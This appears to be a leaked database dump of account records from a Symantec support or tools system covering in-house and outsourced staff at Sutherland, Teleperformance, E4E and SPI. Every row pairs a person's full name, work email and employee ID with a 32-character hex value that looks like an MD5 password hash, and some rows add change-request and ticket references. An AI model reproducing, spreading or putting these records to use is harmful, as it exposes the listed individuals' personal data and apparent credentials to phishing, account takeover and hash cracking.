de60-42b4-99c9-db350ef3a857,CRQ000000513214--vmd--19/01/2012,000-0000,gistools_i
d@symantec.suth.com,Sutherland,c49411eb2ed7c288ee9e8b8f248aebf2,Bombiza,<blank>,
123668,Gisille,NULL,NULL,NULL
383a-431e-90cf-a4478d8c9230,<blank>,<blank>,vasilis_raptis@teleperformance.com,C
T - 08/06/2012 - CRQ000000687730,397929da3b689e153a59cdd41cb27279, Raptis,<blank
>,226444,Vasilis,NULL,NULL,NULL
e560-4ce9-9c04-d0377250b431,CRQ000000601637--vmd--22/03/2012,000-000,reymar_dela
cruz@Suth.com,Sutherland,8970f88853c5d49195a7fc0164dfcf42,Dela Cruz,<blank>,2226
15,Reymar,NULL,NULL,NULL
8758-4eb4-87c2-c95ac05e8493,CRQ000000241079,<blank>,Abdulhameed_Peer@symantec.co
m,KSC-04/15/2011,f48677d1e3eb7b4eae17a1b2ba36f06c,Peer,<blank>,114453,Abdulhamee
d,NULL,NULL,NULL
47bc-47ac-9e0e-051de662ff62,INC213497,nam 07/16/2010,tools_id@symantec.suth.com,
Sutherland,b5634f2f2ee0d43c5920202dacb8e4c2,Lyer,<blank>,075740,Muralidharan,NUL
L,NULL,NULL
186c-4ddf-8f1a-bfeaecd4e08d,CRQ000000653483 SP 8 May 2012,000-0000,kailash_dhare
@symantec.suth.com,Sutherland,6bcedafc70f604212b1f83ea7557f628,Dhare,<blank>,224
435,Kailash,NULL,NULL,NULL
ebfa-4550-87c7-731b9cca77b6,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
208125 - PR - 2/25/2011,13f90fcf6d0628bbed6d8cb2bfcd0d93,Joseph,<blank>,113383,P
rem Prasanth,NULL,NULL,NULL
16ae-4c2d-9b51-8abcebf58c3a,CRQ000000653486 SP 8 May 2012,000-0000,abhijeet_pala
skar@symantec.suth.com,Sutherland,2bc037f35e824f678062d1bf10fa5333,Palaskar,<bla
nk>,224436,Abhijeet,NULL,NULL,NULL
3042-4bea-a371-122392bc00c8,CRQ000000601646--vmd--22/03/2012,000-000,jessica_doc
tor@Suth.com,Sutherland,d47e69e332d31f7199ea9c6315dd5822,Doctor,<blank>,222616,J
essica,NULL,NULL,NULL
45d8-41cd-940a-692732f29cf8,CRQ000000241079,<blank>,Saravanan_S1@symantec.com,ks
c-04/15/2011,d9a769323baa31e704339cac51f0da95,S1,<blank>,114414,Saravanan,NULL,N
ULL,NULL
27c7-434d-96b5-b34badbe58c5,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,bb3b179b3fde0f4468029205d49ccb8c,Trupp,<blank>,083134,Philip,NULL,NULL,NULL
b6e9-461d-a683-5adf51585193,CRQ000000241778,<blank>,nh.symantec@teleperformance.
com.ar,KSC-04/18/2011,15b1377a508cf4ac49d50fdf79d549f9,Dos Santos Araujo,<blank>
,114938,Diego,NULL,NULL,NULL
e9ce-4e1d-baa7-cf32156a7d8a,CRQ000000603616--vmd--23/03/2012,<blank>,jorell_prot
acio@Suth.com,Sutherland,a87c94fd892bfdb1930b2c9c432bd3ce,Protacio,<blank>,22267
6,Jorell,NULL,NULL,NULL
ad32-4e70-9c5a-989154d2a2db,sms 12.11.10,EMPROV,Tools_ID@Symantec.Suth.Com,Suthe
rland,262d285d6e0ee8d6ca724b9cfc1ae677,JeanPeters,<blank>,103119,Evelyne,NULL,NU
LL,NULL
8ac0-4b58-af93-357d5d56bc6c,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
607004 - PR - 27th March 2012,0ede603ae67959c084c5aa777f908949,Nair,<blank>,2231
13,Suraj,NULL,NULL,NULL
59ee-4eae-9042-eb1f49e190c5,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,1d21dff2737bbd837c437c584cd57363,Vizard,<blank>,083139,Sherri,NULL,NULL,NULL
e3a-4b8b-8882-7ca5829e0725,<blank>,86097/2635104,Tools_id@symantec.suth.com,Suth
erland,0f899797347f0a3a26d908c902783e91,Anand,<blank>,aswin_anand,Aswin,NULL,NUL
L,NULL
88ff-4e8f-88a2-4195a1e7432d,RM - 19 dec 2011-CRQ000000459953,<blank>,tools_id@sy
mantec.suth.com,<blank>,5732c4b6bc50c2b08ac9d61b6cd5a7cf,Shaikh,<blank>,123232,M
isbah,NULL,NULL,NULL
c59b-4b9d-9b0e-c54fcd94c7c5,INC213497,nam 07/16/2010,tools_id@symantec.suth.com,
Sutherland,ced31c7c968d8f6a0c15886df553a416,Dhanraj,<blank>,075765,Anitha,NULL,N
ULL,NULL
27e7-440c-a4ab-c06f7bf216eb,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,d2cad39112cfd396d072966fa443ae95,Marshall,<blank>,083116,Richard,NULL,NULL,NULL
627a-43b1-8bb4-18f6fd48fb3f,CRQ000000460079 SP 21 Dec 2011,000-0000,tools_id@sym
antec.suth.com,Sutherland,bd37d732f273ea1b9e71fa5d6e48eb1d,Cantoria,<blank>,1232
11,Lino Salazar,NULL,NULL,NULL
81da-4083-8c35-8d841b3388e3,<blank>,<blank>,tools_id@symantec.suth.com,RM-21Dec-
2011-CRQ000000464905,8e25d1dc0a6a83d8b6b831cc53867c62,Villanueva,<blank>,123252,
Aubrey Alvarez,NULL,NULL,NULL
fa15-41b6-a9af-ddee18727cd9,<blank>,<blank>,tools_id@symantec.suth.com,PM - 10/4
/2011 - CRQ000000349498,6f96831fd92109fcfd3a0ec49ba8a2a2,V V S,<blank>,075664,Vi
jay Mohan,NULL,NULL,NULL
c0e1-4a63-bb8c-5e0f086976f9,<blank>,<blank>,tools_id@symantec.suth.com,11th Jan
2012 - PR - CRQ000000496513,b945ce97231201097ac8d1c8d0c16b41,Placibe,<blank>,123
852,Julito,NULL,NULL,NULL
75e2-4bc8-8f99-0781d0f58abe,CRQ000000641946--vmd--27/04/2012,000-000,satyanaraya
n_iyer@suth.com,Sutherland,21142aa117ecf4794b7a102bf992a774,Iyer,<blank>,224257,
Satyanarayan,NULL,NULL,NULL
26fd-4e3f-b0be-11b88a0ee378,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,1e74bfb8121029f5a3d197548ffc2e39,Vickers\xa0,<blank>,083135,Rick,NULL,NULL,NULL
c98c-40c2-84ec-b0a2d3ec3a00,CRQ000000601680--vmd--22/03/2012,<blank>,leahesperan
za_mendoz@Suth.com,Sutherland,359b7e00a99478fd7276b06a7b62a475,Mendoza,<blank>,2
22628,Leah Esperanza,NULL,NULL,NULL
1d6a-4a53-97b3-95f4cb36fb95,CRQ000000621125 Sp 9 April 2012,000-0000,James_Tayad
e@symantec.suth.com,Sutherland,3f69c2b35afeedbaf2804d4b24b08702,Tayade,<blank>,2
23022,James,NULL,NULL,NULL
90f-4211-8bba-3546ad8c2d81,<blank>,86076,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",fe6e69efbf9c4a9af22db1b5f25bcb31,Abraham,<blank>,paurnami
_abraham,Paurnami,NULL,NULL,NULL
bb36-4f0c-a0bd-74786655e11b,"CRQ000000669871 CLNP May 23,2012",000-000-0000,tool
s_id@symantec.suth.com,Sutherland,9820a907ee11f609c344674d13c835e5,Roy,<blank>,2
25901,Rajesh,NULL,NULL,NULL
9c4b-4ec7-aca0-5f43bca6dfaa,<blank>,<blank>,stanley_lawrans@symantec.com,CRQ0000
00692551 - PR - 12th June 2012,7237dc086edd156c3df18fb3c730eabb,Silva,<blank>,2
26641,Marvin ,NULL,NULL,NULL
6da1-473f-9971-44b85271f8db,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,058236fcb8ade9472466562b189a5bf2,Angamuthu,<blank>,075576,Vijay,NULL,NULL
,NULL
c5a-43e1-b7d9-6ff80904133e,<blank>,89303,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",01002d8e59621bb06c7ce643fcd48733,Kumar M,<blank>,ashok_ku
marm,Ashok,NULL,NULL,NULL
e870-40ad-87f7-805bede38ab0,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,4a7d6fab6ebd000f01537f0eddeb79fa,Mythunni,<blank>,075577,Mohammed,NULL,NU
LL,NULL
dc51-4f83-b8de-c4060184fdcd,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,2d350a725cdc02c16e269e8fd3c3f026,VanArsdale,<blank>,085802,Brian,NULL,NULL,NULL
b2d7-426c-8eea-899fd0e13ec7,05/05/2010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.com,S
utherland,c4da5f4fa9bb023675ab6be34cd2a029,SalinasNeri,<blank>,104909,Mark,NULL,
NULL,NULL
ba46-463f-90a1-434c471b5180,SRB 27.08.2010,INC000000251655,tools_id@symantec.sut
h.com,Sutherland,2ebec0842367bb429615a4b41749beaa,Mohanty,<blank>,096628,Santosh
Kumar,NULL,NULL,NULL
4368-4d60-8623-bc57576174ac,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,c09454ffa2698ef3126495add19308c2,Piesec,<blank>,083125,Stevan,NULL,NULL,NULL
0e99-47b2-9914-9feac04b54c2,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,49c7a34e568df2a85ae34f270b2bdd84,Palanisamy,<blank>,086219,Kaarthick,NULL,NULL,
NULL
27b4-4d4b-b096-cc7e0d75e3c5,sms 20.09.10,<blank>,nh.symantec@teleperformance.com
.ar,Teleperformance,f9f9efd35585118b503c8867b0266706,Lorenzo,<blank>,109059,Loug
hlin,NULL,NULL,NULL
eba7-48a9-b922-9ca29eff3d4c,SRB 19.05.2010,EMPROV,Symaccount@neusoft.com,Neusoft
,7882ef73547dbfc9bb075a059b7e833c,Yachuan,<blank>,104691,Chunzi,NULL,NULL,NULL
dce-4382-ac00-a2ea1fd18626,<blank>,<blank>,audrey.frissen@nl.twenty4help.com,Tel
eperformance Holland,e271c8a5c321248f4ac4d282cccda465,Frissen,<blank>,Audrey_Fri
ssen,Audrey,NULL,NULL,NULL
2217-4da2-b231-58128370d11e,PBP 24/02/2011,<blank>,tools_id@symantec.suth.com,Su
therland,88218aeab5711b5e07f7776fa77b7f6c,Ivy Huevia,<blank>,085766,Abellar,NULL
,NULL,NULL
c42d-4d56-897e-45519bbde09a,<blank>,<blank>,juliusceasar_diosana@SPI.COM,<blank>
,b17603c0d4fb316b65087ab41e366002,Diosana,<blank>,229459,Julius Ceasar,NULL,NULL
,NULL
5d8-49e9-b403-bf640dff2dba,<blank>,<blank>,dave.vanheukelings@nl.twenty4help.com
,Teleperformance Holland,980f93bb5ace9c8ac76c66fcbf0d2826,van Heukelings,<blank>
,Dave_van Heukelings,Dave,NULL,NULL,NULL
b035-4b81-9ef1-3405c7d42ea5,CRQ000000241079,<blank>,Arvind_S@symantec.com,KSC-04
/15/2011,2907c76813939712591e64019bd1df9d,S,<blank>,114688,Arvind,NULL,NULL,NULL
9b69-4f08-949a-8b546bba282a,CRQ000000641955--vmd--27/04/2012,000-000,vimal_chand
@suth.com,sutherland,500d456ec30df62bf4c240a93103b0c4,Chand,<blank>,224259,Vimal
,NULL,NULL,NULL
612-4025-b3ea-0e7fd9aaa994,<blank>,<blank>,midge.huntjens@nl.twenty4help.com,Tel
eperformance Holland,1ca37a425588144e8ce3ee72bb3d38d8,Huntjens,<blank>,Midge_Hun
tjens,Midge,NULL,NULL,NULL
310-477c-8e74-4bdfbde4a163,<blank>,<blank>,mustafa.uyar@nl.twenty4help.com,Telep
erformance Holland,c3be6b7c52f15601e07dc9aac149e13f,Uyar,<blank>,Mustafa_Uyar,Mu
stafa,NULL,NULL,NULL
5038-431f-b0d8-aa8e8da45943,05/05/2010 - SPJ,EMPROV,Tools_ID@Symantec.Suth.com,S
utherland,0bdb2723335bd42e07e5683d5082205d,PenaLoag,<blank>,104906,William,NULL,
NULL,NULL
aa77-4121-91f2-6235766d93f9,CRQ000000241079,<blank>,Mohan_S_P@symantec.com,ksc-0
4/15/2011,ba8a7f970e179f4bbcba7d48f00db276,S_P,<blank>,114444,Mohan,NULL,NULL,NU
LL
8040-4f9e-944e-8556e120bf32,CRQ000000241079,<blank>,Saurabh_Sohaney@symantec.com
,ksc-04/15/2011,6bea3e994c6d2e4eb5e6d9d5a403ccd0,Sohaney,<blank>,114499,Saurabh,
NULL,NULL,NULL
a503-401e-b317-7f90f8ea1a20,CRQ000000641959--vmd--27/04/2012,000-000,deepak_sing
h2@suth.com,sutherland,78a821bc8a768a03c211093dc1a5acb3,Singh,<blank>,224260,Dee
pak,NULL,NULL,NULL
8a3-4c70-9df4-44c75bfaa7cd,<blank>,<blank>,roeland.beckers@nl.twenty4help.com,Te
leperformance Holland,55d3e1478af2b4536cdbb1d3980072e5,Beckers,<blank>,Roeland_B
eckers,Roeland,NULL,NULL,NULL
a55-4aa0-949a-9384f79a54a0,<blank>,<blank>,roy.haesen@nl.twenty4help.com,Teleper
formance Holland,c853bcdbd68f4b55446f4f93ee6e177e,Haesen,<blank>,Roy_Haesen,Roy,
NULL,NULL,NULL
5c2-4441-9551-1df0ff9ac56b,<blank>,<blank>,ruud.appelhof@nl.twenty4help.com,Tele
performance Holland,a443b390a8a8863c6acf69bc6affb70a,Appelhof,<blank>,Ruud_Appel
hof,Ruud,NULL,NULL,NULL
14b-48b6-a51d-1a12d0939153,<blank>,<blank>,ruud.soeren@nl.twenty4help.com,Telepe
rformance Holland,4741e3fc395a9580339c3a07b24fa955,Souren,<blank>,Ruud_Souren,Ru
ud,NULL,NULL,NULL
c3b9-45bb-8720-83967384dfd4,CRQ000000241079,<blank>,Lionel_Varun@symantec.com,ks
c-04/15/2011,3c93bb73f2085cacf9645ec496d2a574,Varun,<blank>,114399,Lionel,NULL,N
ULL,NULL
4af6-4e77-be3f-970bc06b3721,"CRQ000000669900 CLNP May 23,2012",000-000-0000,tool
s_id@symantec.suth.com,Sutherland,8304deceb151c2b39c52ebc41ebee6a1,D''''souza,<b
lank>,225907,Sybil,NULL,NULL,NULL
bf0-46a0-9417-e6e47c144fc3,<blank>,<blank>,bart.brouwers@nl.twenty4help.com,TPH,
7444dccd776012670fdcd0510b305abb,Brouwers,<blank>,Bart_Brouwers,Bart,NULL,NULL,N
ULL
0060-42af-aa33-a303e58ff6db,<blank>,<blank>,Rodelle_Alba@SPI.COM,PM - 6/14/2012
- CRQ000000694533,beb2fc8d279707e84c63cc17081369d8,Alba,<blank>,226728,Rodelle,N
ULL,NULL,NULL
3694-4016-a685-e3c3d9edfaa3,CRQ000000709695--vmd--26/06/2012,<blank>,theojoseph_
galang@suth.com,sutherland,0f77a40c3216137306521030e320cbfb,Galang,<blank>,22644
9,Theo Joseph,NULL,NULL,NULL
9ed-4538-8954-36d4cbfc772a,<blank>,<blank>,frank.hermans@nl.twenty4help.com,TPH,
8d9d8d987bf7b6e6d8b833fdbb638c31,Hermans,<blank>,Frank_Hermans,Frank,NULL,NULL,N
ULL
b76e-4c8a-9565-01f2f6378a96,CRQ000000273448---VMD--07/06/2011,000-000,tools_id@s
ymantec.suth.com,Sutherland,16151466b30044eb69cb57977b1c0a10,Alam Khan,<blank>,1
16975,Shaibaz,NULL,NULL,NULL
e74-4aca-8dd9-059f549bcc50,<blank>,<blank>,john_bauman@symantec.com,Symantec,dfe
4a16dc340ddae62fb45fcbb5ac2d0,Helpdesk,<blank>,helpdesk_admin,IT,NULL,NULL,NULL
ab0-4f2b-95e0-b30d9f104675,<blank>,<blank>,alberto_toni@symantec.com,Symantec,92
cafeaba88449a985f8c98811855cc7,Toni,<blank>,Alberto_Toni,Alberto,NULL,NULL,NULL
862-4f00-9f7d-7e81150d1193,<blank>,<blank>,greg_stout@symantec.com,Symantec,9c90
a618e898b8cd31cc38e44fd585aa,Stout,<blank>,greg_stout,Greg,NULL,NULL,NULL
f19-43f3-aaea-0e95ed2daef9,<blank>,<blank>,thomas_lopez@symantec.com,Symantec,36
aa1fdd42aab734e1e735d822d4ea56,Lopez,<blank>,thomas_lopez,Thomas,NULL,NULL,NULL
d298-4331-b2a7-f463c181f508,CRQ000000621129 SP 9 April 2012,000-0000,Rayon_Perei
ra@symantec.suth.com,Sutherland,2b540e53f0397710f6f7a499cc78a8cc,Pereira,<blank>
,223023,Rayon,NULL,NULL,NULL
a0c-4035-b37b-1c421bb1ddb4,<blank>,<blank>,nelson_barbosa@symantec.com,Symantec,
d13a6aea89847e39c846407112a796b4,Barbosa Jr,<blank>,nelson_barbosa,Nelson,NULL,N
ULL,NULL
b664-4310-b342-70e6c3b40a27,<blank>,<blank>,Christine_Quilaton@SPI.COM,PM - 6/14
/2012 - CRQ000000694487,dc709bbe00dc91a7aec9adb546e6680d,Quilaton,<blank>,226714
,Christine,NULL,NULL,NULL
6bb-4591-8c94-ca54dc624c5a,<blank>,<blank>,eugenia_zarifis@symantec.com,Symantec
,aa9a8a1cd0c8aab2add3fd352da6d8e9,Zarifis,<blank>,Eugenia_Zarifis,Eugenia,NULL,N
ULL,NULL
042-4ba4-b8d4-9134b3d07ebf,<blank>,<blank>,quest_akita@symantec.com,Symantec,943
ee7ce206b7018346453d189ba23ca,Akita,<blank>,quest_akita,Quest,NULL,NULL,NULL
811-48fe-96bb-208f93bb8631,<blank>,<blank>,scot_lovdahl@symantec.com,Symantec,88
9d147f2645673d96e90b163e699367,Lovdahl,<blank>,scot_lovdahl,Scot,NULL,NULL,NULL
4ea5-4f5d-9c3c-c13298720028,CRQ000000621135 Sp 9 April 2012,000-0000,Merzi_Appoo
@symantec.suth.com,Sutherland,8d4f970e538277c19d3477badd2c041c,Appoo,<blank>,223
025,Merzi,NULL,NULL,NULL
d8e-4c81-92e7-d1263b8fe867,<blank>,<blank>,eric_mcculloch@symantec.com,Symantec,
7df904c533fc697ebda4c3e0cc3fac3f,McCulloch,<blank>,eric_mcculloch,Eric,NULL,NULL
,NULL
da7-4cce-a2cc-7cae056ae885,<blank>,084198,symantec_2nd_maa@tp-tec.nl,Symantec,cf
5116f050084ccf717ab284a1452a59,kaspers_cody,<blank>,kaspers_cody,kaspers_cody,NU
LL,NULL,NULL
a2a-4a3d-80ae-30272f7c7415,<blank>,<blank>,ram_mani@symantec.com,Symantec,6e476a
e88617acf634b20a641ff97db3,Mani,<blank>,ram_mani,Ram,NULL,NULL,NULL
897-47d5-9501-fce27b0d41c6,<blank>,<blank>,sean_conrad@symantec.com,Symantec,a2c
be4e9d84f403dd146d30292067964,Conrad,<blank>,sean_conrad,Sean,NULL,NULL,NULL
b1d-40e0-8ef9-c375235c016d,<blank>,<blank>,lindsay_keaglekerr@symantec.com,Syman
tec,76b8f56c680f1000f6a9b68b0c60bc4b,Keagle-Kerr,<blank>,lindsay_kerr,Lindsay,NU
LL,NULL,NULL
04f-4cb0-919b-61d3ff0732da,<blank>,<blank>,jon_ferris@symantec.com,Symantec,61f2
5c27f6271d51fa1c55e3529887cb,Ferris,<blank>,jon_ferris,Jon,NULL,NULL,NULL
aea-4c4f-94c3-622066101df2,<blank>,<blank>,vikas@bhandari@symantec.com,Symantec,
7a4e11d9999b3b348c5810064d071b86,Bhandari,<blank>,vikas_bhandari,Vikas,NULL,NULL
,NULL
93a-4ff3-a8d2-f010c0b6c6bc,<blank>,<blank>,erik_carlstrom@symantec.com,Symantec,
74524bb2f0a2f6ae5cae817a807ef617,Carlstrom,<blank>,erik_carlstrom,Erik,NULL,NULL
,NULL
55cb-4aa9-a014-60fdc679d674,<blank>,<blank>,Thelma_Romposon@SPI.COM,PM - 6/14/20
12 - CRQ000000694490,39ceb84ad19a6f38fe04d581b94acaac,Romposon,<blank>,226715,Th
elma,NULL,NULL,NULL
7bc5-4397-964a-0663936176bf,<blank>,<blank>,Ramoncarlo_Tiu@SPI.COM,PM - 6/14/201
2 - CRQ000000694501,2497ea09c23d6bf601adb935843cd2f7,Tiu,<blank>,226717,Ramon Ca
rlo,NULL,NULL,NULL
51a-459c-ab1e-c68691c97d5d,<blank>,<blank>,navaneetha.ambekar@symantec.ts.e4e.co
m,E4E,12dd95e9e6c1e5643c08c8702d96479a,Ambekar,<blank>,Navaneetha_Ambekar,Navane
etha,NULL,NULL,NULL
2f5-4546-8882-b3e64abc3bca,<blank>,<blank>,raghuraj.gownde@symantec.ts.e4e.com,E
4E,9b1f9985e2ae84915be4f05f48e58dc1,Gownde,<blank>,Raghuraj_Gownde,Raghuraj,NULL
,NULL,NULL
876-48fc-a711-47d3d4a3c15a,<blank>,<blank>,vijay.sanjay@symantec.ts.e4e.com,E4E,
c1610bd554fd55d3817a4e16ea1b76ff,Sanjay,<blank>,Vijay _Sanjay,Vijay ,NULL,NULL
,NULL
25b-4d01-9ec6-d913c903eafe,<blank>,<blank>,arun.madhava@symantec.ts.e4e.com,E4E,
b3597b8394d213f66afbe81849d2db32,m,<blank>,arun_m_e4e,arun,NULL,NULL,NULL
a84-469a-8725-c4b508bfc377,<blank>,<blank>,arun.mohank@symantec.ts.e4e.com,E4E,8
5a1c5f1bd1e46a625360efff7aead78,Mohan,<blank>,Arun_Mohan,Arun,NULL,NULL,NULL
cee-44f7-92fc-0334dccb475f,<blank>,<blank>,reny.racob@symantec.ts.e4e.com,E4E,3d
d124a00d41f5f175a8c6bf099acc1b,jacob,<blank>,reny_jacob,reny,NULL,NULL,NULL
9bc7-45bf-adce-2e215b903c99,CRQ000000241079,<blank>,Muralikrishna_S@symantec.com
,KSC-04/15/2011,89415749ab379c716bbe319fd946709a,S,<blank>,114488,Muralikrishna,
NULL,NULL,NULL
265-485c-bda0-03fc47cff62f,<blank>,<blank>,sharath.kadlabal@symantec.ts.e4e.com,
E4E,0a980a46eba2f8984f33d3dcb20a466b,Kadlabal,<blank>,Sharath_Kadlabal,Sharath,N
ULL,NULL,NULL
e1c0-4e08-8b82-4e8c5d2f2345,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,b4c36b0bb68aef6352c6c4bfc7d4d425,Shoshani,<blank>,083119,Sanar,NULL,NULL,NULL
aaeb-4ecb-8eff-021089db6335,<blank>,<blank>,Joseph_Balauro@SPI.COM,PM - 6/14/201
2 - CRQ000000694536,8913b451fa1cc27a450b5636f5040901,Balauro,<blank>,226729,Jose
ph,NULL,NULL,NULL
5dda-4ea3-a26d-9066007b3a1f,<blank>,<blank>,Stanley_Ong@SPI.COM,PM - 6/14/2012 -
CRQ000000694571,7a6594f72fa12c5bed4ed79e7041b20c,Ong,<blank>,226734,Stanley,NUL
L,NULL,NULL
b9c2-4f68-9116-a4bbf74383f6,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,f69419c53410c2a587bf883758003fe9,RiegoYuzon,<blank>,085758,Michael,NULL,NULL,NU
LL
770e-49cc-9a7b-88fa0a014c48,CRQ000000208080-VMD-25/02/11,000-000,tools_id@symant
ec.suth.com,Sutherland,bde3140345fb7060773a5bf19a907170,Kadari,<blank>,113352,Sr
inu,NULL,NULL,NULL
1773-49a2-a3ab-89b823f931de,<blank>,<blank>,Marklouie_Machate@SPi.COM,PM - 6/14/
2012 - CRQ000000694521,a4b1459bf5a4358ccbacae306d2908db,Machate,<blank>,226724,M
ark Louie,NULL,NULL,NULL
3ca-48da-ac92-09c313adf0ae,<blank>,<blank>,aric_brown@symantec.com,Symantec,e40b
111fecb07950e3a224c19d8cf833,Brown,<blank>,aric_brown,Aric,NULL,NULL,NULL
11d2-44d4-901f-56937dd36057,CRQ000000486364 CLNP 04 Jan 2011,000-0000,tools_id@s
ymantec.suth.com,Sutherland,b5c11dfdc36bb1050a0de33fd4820c04,Monterola,<blank>,1
23641,Charmaine,NULL,NULL,NULL
d0cc-497e-a836-2c8d00e930ce,<blank>,<blank>,Allan_Agbuya@SPI.COM,PM - 6/14/2012
- CRQ000000694530,586e9df39b59ff69ff1a784c26ff47fe,Agbuya,<blank>,226727,Allan,N
ULL,NULL,NULL
105d-4f9b-ba3c-786fcb36bd2f,CRQ000000208152-vmd-25-02-11,000-000,tools_id@symant
ec.suth.com,Sutherland,21a93fbdf297ec1f7f113762a4e06f6a,Patnaik,<blank>,113366,K
iran,NULL,NULL,NULL
03b-41f7-b61f-6f7aa5326a62,<blank>,<blank>,srinivas.s@symantects.chnts.e4e.com,E
4E,68a9b9ed6df6294d45dd7bcbf3d9e812,Sreeramamurthy,<blank>,Srinivas_Sreeramamurt
hy,Srinivas,NULL,NULL,NULL
8144-4c95-9042-9b40a09d8aba,<blank>,<blank>,Michael.Paes@teleperformance.nl,TPH,
f612d2623c7458680bf28c9f912dd290,Paes,<blank>,Michael_Paes,Michael,NULL,NULL,NUL
L
24a1-4913-8283-f84fea99925b,CRQ000000671075--vmd--23/05/2012,<blank>,erika_cayab
yab@suth.com,Sutherland,2890348bea9f76bd690f1f14c5d871f1,Cayabyab,<blank>,225922
,Erika,NULL,NULL,NULL
38d1-4701-852b-db21514b6e20,CRQ000000601649--vmd--22/03/2012,<blank>,arturoiii_e
ncarnado@Suth.com,Sutherland,652f9d517833850b97f27d8f7d20dcc8,Encarnado,<blank>,
222618,Arturo III,NULL,NULL,NULL
104e-4d15-a3af-ad8a6ddd18d2,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,e4c2421bc45e69c3c1293e24692b55c6,Pagsanjan,<blank>,085756,Michelle,NULL,NULL,NU
LL
0fec-4b66-a226-235e0b238fb7,CRQ000000273421--VMD--07/06/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,4a5dd2cf60ec4cdd9cef5c3b94b433f1,Bhati,<blank>,116966
,Neeraj,NULL,NULL,NULL
28f2-4a1b-8580-798de9c6fde2,SRB 12.08.2010,INC000000241142,tools_id@symantec.sut
h.com,Sutherland,bbc10dee4668c0a6637804d8c985a075,N,<blank>,074380,Prabhu,NULL,N
ULL,NULL
055a-4865-8d46-e93bead65a1e,CRQ000000671087--vmd--23/05/2012,<blank>,jonathan_ce
brieros@suth.com,sutherland,a50bc67a3a26ec9569e5195ee7ae2434,Cebrieros,<blank>,2
25923,Jonathan,NULL,NULL,NULL
1a2-4e91-89e7-ed6ffdfbd954,<blank>,85690,Tools_id@symantec.suth.com,Sutherland G
lobal Services,ccdd19ccd28f952ff05cf39c50a0b94e,Chauvin,<blank>,andrew_chauvin,A
ndrew,NULL,NULL,NULL
edaa-4fe6-bff0-fb05a4f4ba7e,CRQ000000671089--vmd--23/05/2012,<blank>,omyrrose_fo
ntelar@suth.com,sutherland,4323af9b5def62dde8de89230b7b1db5,Fontelar,<blank>,225
924,Omyr Rose,NULL,NULL,NULL
d7b9-4b25-a0a5-abda13a8ff7e,CRQ000000671109--vmd--23/05/2012,<blank>,joey_sanosa
@suth.com,sutherland,47d2454078e2834f21df236a17cca368,Sanosa,<blank>,225933,Joey
,NULL,NULL,NULL
e3e-4856-9636-03b77cf533cd,<blank>,<blank>,s.vinod@symanteccs.chnts.e4e.com,E4E,
b0b741a1f4e7e6680c7d8bccdc4e11b9,kumar,<blank>,Vinod_kumar,Vinod,NULL,NULL,NULL
5c9-4dcb-be4c-73c51d9409b2,<blank>,<blank>,Ming_Chai@symantec.com,Symantec,cc24f
40efeaa10ba0e85d98148925952,Shukla,<blank>,091556,Anand,NULL,NULL,NULL
7ef-41a9-8cf5-d89d712db131,<blank>,<blank>,ebith.vadakkayil@symantec.ts.e4e.com,
E4E,f6660f7d5fcb50e6f43292bdd2e8e698,vadakkayil,<blank>,ebith_vadakkayil,ebith,N
ULL,NULL,NULL
3db-475e-9ea5-50c8e6d83d5c,<blank>,<blank>,richard.honeyson@symantec.ts.e4e.com,
E4E,6285d18b6739bf2f8ed5bd897a576874,honeyson,<blank>,richard_honeyson,richard,N
ULL,NULL,NULL
6da6-4ebe-9a9f-584cf6fedfd6,CRQ000000671110--vmd--23/05/2012,<blank>,carlodavid_
solomon@suth.com,sutherland,aa309b7d98fd5b297dc69ed04cfaa1c6,Solomon,<blank>,225
934,Carlo David,NULL,NULL,NULL
a48-4b11-9983-12929698b9d8,<blank>,85696,Tools_id@symantec.suth.com,Sutherland G
lobal Services,1417d8712355a4e57fb1519fdf5c2aa4,Cresswell,<blank>,pierre_cresswe
ll,Pierre,NULL,NULL,NULL
969-4278-8eab-5eb1cdd97146,<blank>,<blank>,shivaprasad.sahu@symantec.ts.e4e.com,
E4E,a6bbde2e291fa9d8a89785bebcfe5435,sahu,<blank>,shivaprasad_sahu,shivaprasad,N
ULL,NULL,NULL
366-464b-a83b-0adbecbd071e,<blank>,<blank>,davy.vanhardeveld@nl.twenty4help.com,
Teleperformance Holland,6c76069c0b1f8f2a858aaeb3ec599162,van Hardeveld,<blank>,D
avy_van Hardeveld,Davy,NULL,NULL,NULL
9ef5-42e8-a5e4-db2a7632262c,"CRQ000000830005 CLNP Oct 08,2012",000-0000,mae_anga
y@symantec.com,Symantec,be700190e40902d6340ccfaccd2a298c,Angay,<blank>,230596,Ma
e,NULL,NULL,NULL
9c2-498f-86d1-eb505480f5c1,<blank>,<blank>,francisco.alanis@nl.twenty4help.com,T
eleperformance Holland,b293985d7448dafb43dd53edfcb7bf5c,Alanis,<blank>,Francisco
_Alanis,Francisco,NULL,NULL,NULL
0deb-44ee-8fef-0dde8944e7bc,<blank>,<blank>,helene_sandasen@teleperformance.com,
CT - 08/06/2012 - CRQ000000687730,d1ce91d491afabb891a3382fd01871bc,Sandasen,<bla
nk>,226445,Helene,NULL,NULL,NULL
7ca-4261-a852-e2701094ff1e,<blank>,<blank>,janwillem.aanink@nl.twenty4help.com,T
eleperformance Holland,268924a77922c94a306ee3e2bdf5982a,Aanink,<blank>,Jan Wille
m_Aanink,Jan Willem,NULL,NULL,NULL
fa70-4de2-923e-b1fc9d0d1631,BPR-13-01-10,EMPROV/INC87845,accounts@symantec.telep
erformance.gr,Teleperformance,abce876eb168116e845b3ad489c1749f,Toepfer,<blank>,0
97986,Jan,NULL,NULL,NULL
